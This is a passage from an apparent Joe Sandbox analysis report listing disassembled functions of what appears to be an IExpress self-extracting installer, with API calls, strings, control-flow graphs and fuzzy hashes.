                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryErrorLast$Message$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    • API String ID: 948580687-552775693
                                                                    • Opcode ID: 1d10b06ffb60c2f9a4994c8529384c1a3f72a6229e0869c97220415a699bab90
                                                                    • Instruction ID: edc6d730c96096715be3504c7a5be0511f4cc8171ae2d9d68ddc2c18e580fbfa
                                                                    • Opcode Fuzzy Hash: 1d10b06ffb60c2f9a4994c8529384c1a3f72a6229e0869c97220415a699bab90
                                                                    • Instruction Fuzzy Hash: 9191B2B6A1474086E720DF21E4547EAF7A5F788768F50013EDA8A47BA8DF3DC646CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65940 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                    • String ID: *MEMCAB$CABINET
                                                                    • API String ID: 1305606123-2642027498
                                                                    • Opcode ID: 0c6c46a489d0fda5dc98469ed81d9ee631a82016382c4a4d309c554a0bb4008b
                                                                    • Instruction ID: e07c374c19bdd3fb0e4384c397836b3d16de743a24b7971b5039f9d9e1cba660
                                                                    • Opcode Fuzzy Hash: 0c6c46a489d0fda5dc98469ed81d9ee631a82016382c4a4d309c554a0bb4008b
                                                                    • Instruction Fuzzy Hash: 905126B5A11B4186FB609F51E8947E6E3A1BB887A9F80413ED94902AACDF3CC257C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB62E28 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 149libraryfileloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 396 13fb62e28-13fb62e50 397 13fb62e52-13fb62e58 396->397 398 13fb62e7d-13fb62e84 call 13fb65b4c 396->398 400 13fb62e70-13fb62e77 call 13fb63d0c 397->400 401 13fb62e5a call 13fb65c0c 397->401 406 13fb62f63 398->406 407 13fb62e8a-13fb62e91 call 13fb66028 398->407 400->398 400->406 408 13fb62e5f-13fb62e61 401->408 409 13fb62f65-13fb62f85 call 13fb67c20 406->409 407->406 415 13fb62e97-13fb62ecd GetSystemDirectoryA call 13fb673cc LoadLibraryA 407->415 408->406 411 13fb62e67-13fb62e6e 408->411 411->398 411->400 418 13fb62ef3-13fb62f02 FreeLibrary 415->418 419 13fb62ecf-13fb62ee2 GetProcAddress 415->419 421 13fb62f08-13fb62f0e 418->421 422 13fb62f9f-13fb62fae SetCurrentDirectoryA 418->422 419->418 420 13fb62ee4-13fb62eed DecryptFileA 419->420 420->418 421->422 425 13fb62f14-13fb62f29 GetWindowsDirectoryA 421->425 423 13fb62fb0-13fb62fb5 422->423 424 13fb62fba-13fb62fc0 422->424 426 13fb62f30-13fb62f5d call 13fb64a70 GetLastError 423->426 427 13fb63056-13fb6305e 424->427 428 13fb62fc6-13fb62fcd 424->428 429 13fb62f86-13fb62f96 call 13fb665b0 425->429 430 13fb62f2b 425->430 426->406 433 13fb63072 427->433 434 13fb63060-13fb63062 427->434 435 13fb62fd2-13fb62fe0 428->435 438 13fb62f9b-13fb62f9d 429->438 430->426 437 13fb63074-13fb63082 433->437 434->433 439 13fb63064-13fb6306b call 13fb62174 434->439 435->435 440 13fb62fe2-13fb62fe9 435->440 444 13fb63084-13fb6308a 437->444 445 13fb6309f-13fb630a6 437->445 438->406 438->422 446 13fb63070 439->446 442 13fb63024 call 13fb65940 440->442 443 13fb62feb-13fb62ff2 440->443 453 13fb63029 442->453 443->442 447 13fb62ff4-13fb63022 call 13fb67304 443->447 444->445 449 13fb6308c call 13fb63e4c 444->449 450 13fb630a8-13fb630aa 445->450 451 13fb630b1-13fb630b6 445->451 446->437 457 13fb6302b 447->457 458 13fb63091-13fb63093 449->458 450->451 455 13fb630ac call 13fb6466c 450->455 451->409 453->457 455->451 460 13fb6302d-13fb63037 457->460 461 13fb6303c-13fb6304a call 13fb66fb0 457->461 458->406 462 13fb63099 458->462 460->406 461->406 465 13fb63050 461->465 462->445 465->427
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$ErrorLastLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystemWindows
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                    • API String ID: 89276366-2184067320
                                                                    • Opcode ID: 7298bcec91a35e74cce7102c22ba9d824c4011d00aaa7125e6909d84ce458b88
                                                                    • Instruction ID: 5f766564e1806c435d21420cc33a46ed279bb23d25bcd893bddac1dcd85e5065
                                                                    • Opcode Fuzzy Hash: 7298bcec91a35e74cce7102c22ba9d824c4011d00aaa7125e6909d84ce458b88
                                                                    • Instruction Fuzzy Hash: 84614AF1F0064186FF609B21E9503E5E3A4EB947B4F54403EE989826ADDB6CCB47C750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65E4C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 124COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 493 13fb65e4c-13fb65e78 494 13fb65f41-13fb65f50 493->494 495 13fb65e7e-13fb65e83 call 13fb65d44 493->495 496 13fb65f53-13fb65f5d 494->496 498 13fb65e88-13fb65e8a 495->498 499 13fb65f72-13fb65f7d 496->499 500 13fb65f5f-13fb65f65 496->500 501 13fb65e90-13fb65ea6 498->501 502 13fb65fed-13fb65fef 498->502 504 13fb65f80-13fb65f8a call 13fb6648c 499->504 500->499 503 13fb65f67-13fb65f70 500->503 505 13fb65ea9-13fb65eb3 501->505 506 13fb65ffd-13fb66021 call 13fb67c20 502->506 503->496 503->499 516 13fb65fa5-13fb65fa7 504->516 517 13fb65f8c-13fb65f99 CreateDirectoryA 504->517 508 13fb65ec8-13fb65edd 505->508 509 13fb65eb5-13fb65ebb 505->509 513 13fb65edf-13fb65ef1 GetSystemInfo 508->513 514 13fb65f2e-13fb65f3f call 13fb673cc 508->514 509->508 512 13fb65ebd-13fb65ec6 509->512 512->505 512->508 519 13fb65ef3-13fb65ef6 513->519 520 13fb65f1d 513->520 514->504 523 13fb65ff1-13fb65ff8 516->523 524 13fb65fa9-13fb65fb1 call 13fb665b0 516->524 521 13fb65fd3-13fb65fe7 GetLastError 517->521 522 13fb65f9b 517->522 526 13fb65ef8-13fb65efb 519->526 527 13fb65f14-13fb65f1b 519->527 528 13fb65f24-13fb65f29 call 13fb673cc 520->528 521->502 522->516 523->506 530 13fb65fb6-13fb65fb8 524->530 531 13fb65efd-13fb65f00 526->531 532 13fb65f0b-13fb65f12 526->532 527->528 528->514 530->523 534 13fb65fba-13fb65fc0 530->534 531->514 535 13fb65f02-13fb65f09 531->535 532->528 534->502 536 13fb65fc2-13fb65fd1 RemoveDirectoryA 534->536 535->528 536->502
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65EE4
                                                                    • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65F91
                                                                    • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65FCB
                                                                      • Part of subcall function 000000013FB65D44: RemoveDirectoryA.KERNELBASE(0000000A,000000013FB62A5F), ref: 000000013FB65DAF
                                                                      • Part of subcall function 000000013FB65D44: GetFileAttributesA.KERNELBASE ref: 000000013FB65DB8
                                                                      • Part of subcall function 000000013FB65D44: GetTempFileNameA.KERNEL32 ref: 000000013FB65DDB
                                                                      • Part of subcall function 000000013FB65D44: DeleteFileA.KERNEL32 ref: 000000013FB65DED
                                                                      • Part of subcall function 000000013FB65D44: CreateDirectoryA.KERNEL32 ref: 000000013FB65DF8
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65FD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteErrorInfoLastNameSystemTemp
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                    • API String ID: 3170954203-3938192293
                                                                    • Opcode ID: d116721c738d00c164cd3631cc6f2c60d9e10c0bd18d4cd6bae3e49295d042fb
                                                                    • Instruction ID: 48f9f66e994672114261fd681da69c27328384eef84a36ec3a0e47fb19ecf8fc
                                                                    • Opcode Fuzzy Hash: d116721c738d00c164cd3631cc6f2c60d9e10c0bd18d4cd6bae3e49295d042fb
                                                                    • Instruction Fuzzy Hash: AD516CF2F1478482FB648F25E9143E9E3A4A7847A0F98413ED94A4669DDF79CB16C310
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64478 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112processsynchronizationwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 537 13fb64478-13fb644f4 CreateProcessA 538 13fb645d3-13fb6463a GetLastError * 2 FormatMessageA call 13fb64a70 537->538 539 13fb644fa-13fb64523 WaitForSingleObject GetExitCodeProcess 537->539 544 13fb6463f 538->544 540 13fb64525-13fb6452e 539->540 541 13fb6454a-13fb64554 539->541 540->541 543 13fb64530-13fb64533 540->543 545 13fb64556-13fb6455c 541->545 546 13fb6455e-13fb64565 541->546 543->541 547 13fb64535-13fb64544 543->547 548 13fb64641-13fb64664 call 13fb67c20 544->548 549 13fb645a8-13fb645c8 CloseHandle * 2 545->549 550 13fb64567-13fb64574 call 13fb62174 546->550 551 13fb6459e 546->551 547->541 549->548 553 13fb645ca-13fb645cf 549->553 555 13fb64579-13fb6457b 550->555 551->549 553->548 556 13fb645d1 553->556 555->551 558 13fb6457d-13fb64589 555->558 556->544 559 13fb64590-13fb6459a 558->559 560 13fb6458b-13fb6458e 558->560 559->549 561 13fb6459c 559->561 560->551 560->559 561->545
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLastProcess$CodeCreateExitFormatMessageObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 3794558871-3916222277
                                                                    • Opcode ID: 9f5f1d435d494857f467c4df7531989be3996456b61f4ede157ba57c6f223fef
                                                                    • Instruction ID: 3bca8fecd6f107c06b9ec51a7ba8c6e2b1fbdb6e4f416d508036b932917bf108
                                                                    • Opcode Fuzzy Hash: 9f5f1d435d494857f467c4df7531989be3996456b61f4ede157ba57c6f223fef
                                                                    • Instruction Fuzzy Hash: 665145B2A14B40C6F7609F14E8557DAF7A0F7887B8F10013DEA49466ACDB7CC646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB629E4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 79libraryloadershutdownCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 562 13fb629e4-13fb62a03 GetVersion 563 13fb62a05-13fb62a07 562->563 564 13fb62a41-13fb62a54 call 13fb62b24 562->564 563->564 566 13fb62a09-13fb62a19 GetModuleHandleW 563->566 570 13fb62af3-13fb62afd 564->570 571 13fb62a5a-13fb62a61 call 13fb62e28 call 13fb630c4 564->571 566->564 567 13fb62a1b-13fb62a2e GetProcAddress 566->567 567->564 569 13fb62a30-13fb62a39 567->569 569->564 573 13fb62b05-13fb62b1a 570->573 574 13fb62aff CloseHandle 570->574 577 13fb62a66-13fb62a68 571->577 574->573 577->570 578 13fb62a6e-13fb62a75 577->578 578->570 579 13fb62a77-13fb62a81 578->579 579->570 580 13fb62a83-13fb62a87 579->580 581 13fb62aa7-13fb62aab 580->581 582 13fb62a89-13fb62a8f 580->582 583 13fb62ad8-13fb62adf 581->583 584 13fb62aad-13fb62ad6 call 13fb64a70 581->584 582->581 585 13fb62a91-13fb62aa5 call 13fb62174 582->585 588 13fb62ae1-13fb62aec ExitWindowsEx 583->588 589 13fb62aee call 13fb61b44 583->589 584->570 584->583 585->570 585->581 588->570 589->570
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                    • String ID: @$HeapSetInformation$Kernel32.dll
                                                                    • API String ID: 1302179841-1204263913
                                                                    • Opcode ID: ce021ab3524c38f82bffb0e3de339560c67142cd7d7947d6df8012e561f83b94
                                                                    • Instruction ID: 33e55b047f477e8251fe6bd694c395f0ae2f6bcbf74f33c7763e8d7b5a627745
                                                                    • Opcode Fuzzy Hash: ce021ab3524c38f82bffb0e3de339560c67142cd7d7947d6df8012e561f83b94
                                                                    • Instruction Fuzzy Hash: 053120F1E0024185FF749B60E8457EAE2A0FB58BB4F58403DDA89566ADDBBCC747C601
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB61F00 Relevance: 12.1, APIs: 8, Instructions: 111filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                    • String ID:
                                                                    • API String ID: 836429354-0
                                                                    • Opcode ID: a76de7a235391c51c9a3471388bf9658f3eb67c567768510dcd7feabb49bd64a
                                                                    • Instruction ID: 4ccd1661f24bafc2282c151dd31eac9e03549dbb4e5aea19243bd602fdac1186
                                                                    • Opcode Fuzzy Hash: a76de7a235391c51c9a3471388bf9658f3eb67c567768510dcd7feabb49bd64a
                                                                    • Instruction Fuzzy Hash: AA418BB2A15B8495EF11DF20D8543E9B3A1F744BA8F84413AEA9D476DDDF38CA0AC300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB67F40 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 3c128b76d22e0f08333aca8b13059fe7dc42df365bac19dcaa2f659e341ad33d
                                                                    • Instruction ID: 0269bdb5d15025fe681532adb80d94e3c3678dcc1b5cc2d440ef217e7d724d7b
                                                                    • Opcode Fuzzy Hash: 3c128b76d22e0f08333aca8b13059fe7dc42df365bac19dcaa2f659e341ad33d
                                                                    • Instruction Fuzzy Hash: B3B09260E21440C2D604AB21DCA538493A0775C324FD00424800980228DA5C829BC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB630C4 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89registryfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 466 13fb630c4-13fb630ea 467 13fb6312e-13fb63131 466->467 468 13fb63133-13fb63140 467->468 469 13fb630ec-13fb630f6 467->469 472 13fb63146-13fb6314d 468->472 473 13fb631cd-13fb631d4 468->473 470 13fb63118-13fb63128 LocalFree * 2 469->470 471 13fb630f8-13fb630ff 469->471 470->467 471->470 474 13fb63101-13fb63112 SetFileAttributesA DeleteFileA 471->474 472->473 477 13fb6314f-13fb63156 472->477 475 13fb631d6-13fb631d8 473->475 476 13fb6322b-13fb63252 call 13fb67c20 473->476 474->470 475->476 478 13fb631da-13fb631e1 475->478 477->473 480 13fb63158-13fb6316c 477->480 478->476 481 13fb631e3-13fb6320c RegOpenKeyExA 478->481 483 13fb63171-13fb6317b 480->483 481->476 484 13fb6320e-13fb63225 RegDeleteValueA RegCloseKey 481->484 485 13fb6318f-13fb631a4 483->485 486 13fb6317d-13fb63183 483->486 484->476 488 13fb631a6-13fb631ab call 13fb6745c 485->488 489 13fb631b0-13fb631c2 SetCurrentDirectoryA call 13fb61f00 485->489 486->485 487 13fb63185-13fb6318d 486->487 487->483 487->485 488->489 492 13fb631c7 489->492 492->473
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                    • API String ID: 3049360512-509129362
                                                                    • Opcode ID: 139c24f63efaaecf273668afafadc40c041a4949118b42efaaf16138047ed078
                                                                    • Instruction ID: a9384d7c14813694cbddf8fbb25901fe8dad258c1840967c5e8f3cda30cf7f2d
                                                                    • Opcode Fuzzy Hash: 139c24f63efaaecf273668afafadc40c041a4949118b42efaaf16138047ed078
                                                                    • Instruction Fuzzy Hash: EF4149F1B14A8492FF50AB25E8543E9F3A0F784BA5F48403ADA49477ACDB3CC64AC750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB62174 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 70registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 593 13fb62174-13fb62186 594 13fb6227e-13fb62283 call 13fb620c0 593->594 595 13fb6218c-13fb62190 593->595 601 13fb62285-13fb62294 594->601 597 13fb62192 595->597 598 13fb6220e-13fb62239 RegOpenKeyExA 595->598 600 13fb62198-13fb6219c 597->600 597->601 602 13fb6223b-13fb62279 RegQueryInfoKeyA 598->602 603 13fb62209-13fb6220c 598->603 600->601 605 13fb621a2-13fb621cd RegOpenKeyExA 600->605 604 13fb621f4-13fb62203 RegCloseKey 602->604 603->601 604->603 605->603 606 13fb621cf-13fb621ee RegQueryValueExA 605->606 606->604
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                    • API String ID: 2209512893-559176071
                                                                    • Opcode ID: f9c9f28ba430a97cac6df1d6b2180f89cf8a91fb3d1549dce7b445f5981c95c9
                                                                    • Instruction ID: c9a5e33ef7bd070bb070fb2498af93227a6d5e540b1c8c09c23cd9adf202b58a
                                                                    • Opcode Fuzzy Hash: f9c9f28ba430a97cac6df1d6b2180f89cf8a91fb3d1549dce7b445f5981c95c9
                                                                    • Instruction Fuzzy Hash: 603161B2A04B40C7EB609F65F8907D9F3A4F7487A8F540539E69943B5CDB38C265C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65D44 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                    • String ID: IXP$IXP%03d.TMP
                                                                    • API String ID: 1082909758-3932986939
                                                                    • Opcode ID: 937e6bdce64174802cee2c0ad824f938e86808294fa9af023a4be056ef510fcc
                                                                    • Instruction ID: bd5e91827bcee962e986b44fd1e82e07ca4003f3e2e646e328668101ce7ad90b
                                                                    • Opcode Fuzzy Hash: 937e6bdce64174802cee2c0ad824f938e86808294fa9af023a4be056ef510fcc
                                                                    • Instruction Fuzzy Hash: 802154B1B0494042FB14AB16E9943E9E251F789BE4F4441399D4D47AEDDF3CC65BC600
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65C0C Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 74memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
                                                                      • Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64D13
                                                                      • Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
                                                                      • Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
                                                                      • Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
                                                                      • Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,00000000,000000013FB62E5F), ref: 000000013FB65C31
                                                                    • GetLastError.KERNEL32 ref: 000000013FB65C5D
                                                                    • LocalFree.KERNEL32 ref: 000000013FB65CB3
                                                                      • Part of subcall function 000000013FB64A70: LoadStringA.USER32 ref: 000000013FB64B04
                                                                      • Part of subcall function 000000013FB64A70: MessageBoxA.USER32 ref: 000000013FB64B3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                    • String ID: $<None>$UPROMPT
                                                                    • API String ID: 957408736-2569542085
